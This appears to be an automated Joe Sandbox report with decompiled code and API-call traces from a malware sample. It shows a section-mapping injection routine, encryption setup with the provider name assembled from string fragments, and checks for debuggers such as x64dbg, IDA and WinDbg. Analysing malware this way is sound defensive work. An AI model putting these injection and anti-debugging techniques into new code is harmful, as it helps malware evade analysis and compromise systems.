Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: ff8b0466e8b9a07ac2027ad4c9a252600819c1965c523a4f913306aebf181b9f
Instruction ID: 0e5d671145175133b10e5a8ab281a39b469cb3f87768d2fb331155c0ff2a7710
Opcode Fuzzy Hash: ff8b0466e8b9a07ac2027ad4c9a252600819c1965c523a4f913306aebf181b9f
Instruction Fuzzy Hash: C5F0A432349246FBDB01AED4DC91EAD33A59B40310F20047BB653FA0E1D67DC912AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004019C5 Relevance: 1.3, APIs: 1, Instructions: 42
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004019C5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				void* _t19;
				void* _t25;
				void* _t27;
				intOrPtr* _t29;

				_t32 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				_t29 = _t27 + 1 - 1;
				_t19 = 0x61;
				L004012ED(_t8, __ebx, _t19, __edi, __esi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_t11 = L00401522(_t25 - 4, _t17, _t32, _t17,  *((intOrPtr*)(_t25 + 0xc))); // executed
				_t33 = _t11;
				if(_t11 != 0) {
					E004015EB(_t33, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t29;
				return L004012ED(_t13, _t17, 0x61, _t21, _t23, _t33);
			}

0x004019c5
0x004019c5
0x004019c5
0x004019c6
0x004019c2
0x004019ca
0x004019cf
0x004019d7
0x004019dd
0x004019de
0x004019e5
0x004019ea
0x004019ec
0x004019f6
0x004019f6
0x004019ff
0x00401a08
0x00401a0d
0x00401a34

APIs

Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: ecc63529a8df23c14f7036961a240bf8bd8ca2361d037dcff9b7a36a2e04d9f5
Instruction ID: a5ce4ed59abcd09e83e148daddf3c5cf74a52f34f12c25f43b8373eb0755b928
Opcode Fuzzy Hash: ecc63529a8df23c14f7036961a240bf8bd8ca2361d037dcff9b7a36a2e04d9f5
Instruction Fuzzy Hash: 4DF0C272308244FBDB006ED49C81EAD33A59B40710F200477B653B80F1C57D8922AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004019C9 Relevance: 1.3, APIs: 1, Instructions: 37
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E004019C9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				void* _t25;
				intOrPtr* _t27;

				_t30 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("cmc");
				L004012ED(_t8, __ebx, __ecx, __edi, __esi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_t11 = L00401522(_t25 - 4, _t17, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc))); // executed
				_t31 = _t11;
				if(_t11 != 0) {
					E004015EB(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t27;
				return L004012ED(_t13, _t17, 0x61, _t21, _t23, _t31);
			}

0x004019c9
0x004019c9
0x004019c9
0x004019c9
0x004019ca
0x004019cf
0x004019d7
0x004019dd
0x004019de
0x004019e5
0x004019ea
0x004019ec
0x004019f6
0x004019f6
0x004019ff
0x00401a08
0x00401a0d
0x00401a34

APIs

Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 0e4832ae9175ffecd7412843673cfb81c6e930cec8928ebf691fc2893bb779ee
Instruction ID: 650a10402776a7326af24cc711a21d3f22586efd6f7ee03a7f70e365e26de698
Opcode Fuzzy Hash: 0e4832ae9175ffecd7412843673cfb81c6e930cec8928ebf691fc2893bb779ee
Instruction Fuzzy Hash: 5EF09032304245FBDB00AFD49C81AAE33659B44310F200877B653B80E1C63D8912AB2B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FA4C6C0 Relevance: 93.0, APIs: 44, Strings: 9, Instructions: 227encryptionCOMMON

Download Yara Rule

APIs

#644.MSVBVM60(00000000,00000000,000572D2,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C6FE
__vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C716
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C723
__vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C72B
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C732
__vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C73A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C741
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C744
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C754
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C771
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C785
__vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C797
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C79E
__vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7A6
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7AD
__vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7B5
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7BC
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7BF
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 0FA4C7CF
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0FA4C7EC
#644.MSVBVM60(00000000), ref: 0FA4C800
__vbaStrCat.MSVBVM60(rosoft Enhan,Mic), ref: 0FA4C812
__vbaStrMove.MSVBVM60 ref: 0FA4C819
__vbaStrCat.MSVBVM60(ced RSA and AE,00000000), ref: 0FA4C821
__vbaStrMove.MSVBVM60 ref: 0FA4C828
__vbaStrCat.MSVBVM60(S Cryptographic Provider (Pr,00000000), ref: 0FA4C830
__vbaStrMove.MSVBVM60 ref: 0FA4C837
__vbaStrCat.MSVBVM60(ototype),00000000), ref: 0FA4C83F
__vbaStrMove.MSVBVM60 ref: 0FA4C846
#644.MSVBVM60(00000000), ref: 0FA4C849
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000), ref: 0FA4C859
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0FA4C87A
#644.MSVBVM60(00000000), ref: 0FA4C88E
__vbaStrCat.MSVBVM60(rosoft Enhan,Mic), ref: 0FA4C8A0
__vbaStrMove.MSVBVM60 ref: 0FA4C8A7
__vbaStrCat.MSVBVM60(ced RSA and AE,00000000), ref: 0FA4C8AF
__vbaStrMove.MSVBVM60 ref: 0FA4C8B6
__vbaStrCat.MSVBVM60(S Cryptographic Provider (Pr,00000000), ref: 0FA4C8BE
__vbaStrMove.MSVBVM60 ref: 0FA4C8C5
__vbaStrCat.MSVBVM60(ototype),00000000), ref: 0FA4C8CD
__vbaStrMove.MSVBVM60 ref: 0FA4C8D4
#644.MSVBVM60(00000000), ref: 0FA4C8D7
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 0FA4C8E7
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0FA4C908

Strings

ototype), xrefs: 0FA4C83A, 0FA4C8C8
SA and AES Cryptogra, xrefs: 0FA4C726, 0FA4C7A1
Enhanced R, xrefs: 0FA4C70F, 0FA4C790
S Cryptographic Provider (Pr, xrefs: 0FA4C82B, 0FA4C8B9
ced RSA and AE, xrefs: 0FA4C81C, 0FA4C8AA
Mic, xrefs: 0FA4C806, 0FA4C894
Microsoft, xrefs: 0FA4C70A, 0FA4C78B
rosoft Enhan, xrefs: 0FA4C80B, 0FA4C899
phic Provider, xrefs: 0FA4C735, 0FA4C7B0

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$#644$AcquireContextCryptFreeList
String ID: Enhanced R$Mic$Microsoft$S Cryptographic Provider (Pr$SA and AES Cryptogra$ced RSA and AE$ototype)$phic Provider$rosoft Enhan
API String ID: 3973273867-1573692794
Opcode ID: 6a25684ae1d931c06cc328b41b4e737384a4393f0cf95d610c42d3b5ac769cab
Instruction ID: b519a1cfb8a619abdce2c62a3cdcad8e0c5dc43bc4ca042af7457719c83e89b0
Opcode Fuzzy Hash: 6a25684ae1d931c06cc328b41b4e737384a4393f0cf95d610c42d3b5ac769cab
Instruction Fuzzy Hash: 6B61F272E502587BDB11EBF4CC86EEF7BB8EF49751F104526F602E2141EEB859058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4C020 Relevance: 63.5, APIs: 42, Instructions: 474encryptionCOMMON

Download Yara Rule

APIs

__vbaVarCopy.MSVBVM60(?,?,000572D2,?), ref: 0FA4C0B0

Part of subcall function 0FA4C6C0: #644.MSVBVM60(00000000,00000000,000572D2,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C6FE
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C716
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C723
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C72B
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C732
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C73A
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C741
Part of subcall function 0FA4C6C0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C744
Part of subcall function 0FA4C6C0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C754
Part of subcall function 0FA4C6C0: __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C771
Part of subcall function 0FA4C6C0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C785
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C797
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C79E
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7A6
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7AD
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7B5
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7BC
Part of subcall function 0FA4C6C0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7BF
Part of subcall function 0FA4C6C0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 0FA4C7CF

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000), ref: 0FA4C0DD
__vbaVarZero.MSVBVM60 ref: 0FA4C102
__vbaVarMove.MSVBVM60 ref: 0FA4C132
__vbaVarMove.MSVBVM60 ref: 0FA4C14E
__vbaVarMove.MSVBVM60 ref: 0FA4C177
#644.MSVBVM60(?), ref: 0FA4C17D
__vbaVarMove.MSVBVM60 ref: 0FA4C1AA
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C1D6
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 0FA4C1F9
__vbaVarZero.MSVBVM60 ref: 0FA4C228

Part of subcall function 0FA4BF90: __vbaVarVargNofree.MSVBVM60(0005703E,00000000,00056ED2,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFC7
Part of subcall function 0FA4BF90: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD2
Part of subcall function 0FA4BF90: #644.MSVBVM60(00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD9
Part of subcall function 0FA4BF90: __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFE5

__vbaVarMove.MSVBVM60(?), ref: 0FA4C277
__vbaLenBstr.MSVBVM60(?), ref: 0FA4C280
__vbaVarMove.MSVBVM60 ref: 0FA4C2A4
__vbaVarMove.MSVBVM60 ref: 0FA4C2CD
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C2F9
__vbaFreeVar.MSVBVM60 ref: 0FA4C317
CryptDeriveKey.ADVAPI32(?,00006610,?,00000000,?), ref: 0FA4C33C
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000), ref: 0FA4C35B
__vbaVarZero.MSVBVM60 ref: 0FA4C38A
__vbaVarMove.MSVBVM60 ref: 0FA4C3BA
__vbaVarMove.MSVBVM60 ref: 0FA4C3DA
__vbaVarMove.MSVBVM60 ref: 0FA4C403
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA4C40F
#644.MSVBVM60(0FA32FF6), ref: 0FA4C421
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4C431
__vbaVarMove.MSVBVM60 ref: 0FA4C464
#644.MSVBVM60(?), ref: 0FA4C476
__vbaVarMove.MSVBVM60 ref: 0FA4C4A3
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C4C9
__vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0FA4C4E4
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0FA4C509
__vbaVarZero.MSVBVM60 ref: 0FA4C538
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C562
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0FA4C57D
__vbaVarZero.MSVBVM60 ref: 0FA4C5AC
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C5D6
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000001,00000000), ref: 0FA4C5F6
__vbaVarZero.MSVBVM60 ref: 0FA4C61B
__vbaVarMove.MSVBVM60 ref: 0FA4C641
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C667
__vbaFreeVar.MSVBVM60(0FA4C69E), ref: 0FA4C697

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$#644$Redim$EraseZero$Free$Crypt$AcquireContext$BstrCopyDeriveListLockNofreePreserveUnlockVarg
String ID:
API String ID: 3659106278-0
Opcode ID: 7b63cfa2b1726ed7cb676f0a70a2718fd124f26fabc95339cc20e4a37ef26cad
Instruction ID: a4d0fd0662821007d49ba29956c2491f54ca4a1f9f1bd0e721bac4bba63de4ea
Opcode Fuzzy Hash: 7b63cfa2b1726ed7cb676f0a70a2718fd124f26fabc95339cc20e4a37ef26cad
Instruction Fuzzy Hash: BB222970E002089FEB18DFA8D998FADBBB5FF84310F018159E519AB355DB74AA45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FA49BC0 Relevance: 147.4, APIs: 76, Strings: 8, Instructions: 404COMMON

Download Yara Rule

APIs

#644.MSVBVM60(x64dbg,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C0B
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C10
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C22
#644.MSVBVM60(x32dbg,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C41
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C47
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C56
#644.MSVBVM60(IDA,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C75
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C7B
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C8A
__vbaStrCat.MSVBVM60(0FA35EA4,0FA35E9C,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CB4
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CC1
__vbaStrCat.MSVBVM60(0FA35EAC,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CC9
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CD0
__vbaStrCat.MSVBVM60(0FA35EB4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CD8
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CDF
__vbaStrCat.MSVBVM60(0FA35EBC,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CE7
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CEE
__vbaStrCat.MSVBVM60(0FA35EC4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CF6
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CFD
__vbaStrCat.MSVBVM60(0FA35ECC,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D05
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D0C
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D0F
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D16
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D25
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0FA49D45
#644.MSVBVM60(WinDbgFrameClass), ref: 0FA49D6B
#644.MSVBVM60(00000000), ref: 0FA49D72
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49D81
#644.MSVBVM60(ObsidianGUI), ref: 0FA49DA4
#644.MSVBVM60(00000000), ref: 0FA49DAB
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49DBA
__vbaStrCat.MSVBVM60(0FA35F20,0FA35F18), ref: 0FA49DE2
__vbaStrMove.MSVBVM60 ref: 0FA49DE9
__vbaStrCat.MSVBVM60(0FA35F20,00000000), ref: 0FA49DF1
__vbaStrMove.MSVBVM60 ref: 0FA49DF8
__vbaStrCat.MSVBVM60(0FA35F28,00000000), ref: 0FA49E00
__vbaStrMove.MSVBVM60 ref: 0FA49E07
__vbaStrCat.MSVBVM60(0FA35EBC,00000000), ref: 0FA49E0F
__vbaStrMove.MSVBVM60 ref: 0FA49E16
__vbaStrCat.MSVBVM60(0FA35EC4,00000000), ref: 0FA49E1E
__vbaStrMove.MSVBVM60 ref: 0FA49E25
__vbaStrCat.MSVBVM60(0FA35ECC,00000000), ref: 0FA49E2D
__vbaStrMove.MSVBVM60 ref: 0FA49E34
#644.MSVBVM60(00000000), ref: 0FA49E37
#644.MSVBVM60(00000000), ref: 0FA49E3E
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49E4D
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0FA49E6D
#644.MSVBVM60(Soft Ice), ref: 0FA49E93
#644.MSVBVM60(00000000), ref: 0FA49E9A
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49EA9
__vbaStrCat.MSVBVM60(0FA35F50,0FA35F48), ref: 0FA49ED1
__vbaStrMove.MSVBVM60 ref: 0FA49ED8
__vbaStrCat.MSVBVM60(0FA35F50,00000000), ref: 0FA49EE0
__vbaStrMove.MSVBVM60 ref: 0FA49EE7
__vbaStrCat.MSVBVM60(0FA35EBC,00000000), ref: 0FA49EEF
__vbaStrMove.MSVBVM60 ref: 0FA49EF6
__vbaStrCat.MSVBVM60(0FA35EC4,00000000), ref: 0FA49EFE
__vbaStrMove.MSVBVM60 ref: 0FA49F05
__vbaStrCat.MSVBVM60(0FA35ECC,00000000), ref: 0FA49F0D
__vbaStrMove.MSVBVM60 ref: 0FA49F14
#644.MSVBVM60(00000000), ref: 0FA49F17
#644.MSVBVM60(00000000), ref: 0FA49F1D
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0FA49F28
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0FA49F44
#644.MSVBVM60(0FA35E28), ref: 0FA49F67
#644.MSVBVM60(00000000), ref: 0FA49F6D
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0FA49F7F
#644.MSVBVM60(Zeta Debugger), ref: 0FA49F9E
#644.MSVBVM60(00000000), ref: 0FA49FA5
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49FB4
#713.MSVBVM60(reggubeD kcoR), ref: 0FA49FD3
__vbaStrMove.MSVBVM60 ref: 0FA49FDE
#644.MSVBVM60(00000000), ref: 0FA49FE1
#644.MSVBVM60(00000000), ref: 0FA49FE7
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0FA49FF2
__vbaFreeStr.MSVBVM60 ref: 0FA4A002

Strings

Zeta Debugger, xrefs: 0FA49F99
x32dbg, xrefs: 0FA49C3C
IDA, xrefs: 0FA49C70
WinDbgFrameClass, xrefs: 0FA49D66
ObsidianGUI, xrefs: 0FA49D9F
x64dbg, xrefs: 0FA49BF1
reggubeD kcoR, xrefs: 0FA49FCE
Soft Ice, xrefs: 0FA49E8E

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644$Move$ErrorSystem$Free$List$#713
String ID: IDA$ObsidianGUI$Soft Ice$WinDbgFrameClass$Zeta Debugger$reggubeD kcoR$x32dbg$x64dbg
API String ID: 2197934108-1338123029
Opcode ID: 45e7551037c73fb1ac2498a493f08ad9909de1b61573c468ce027248a566e993
Instruction ID: a834c709c496c29a81fa535a2813a3303298c1f34ebd7c26ea07ed712ab5de1a
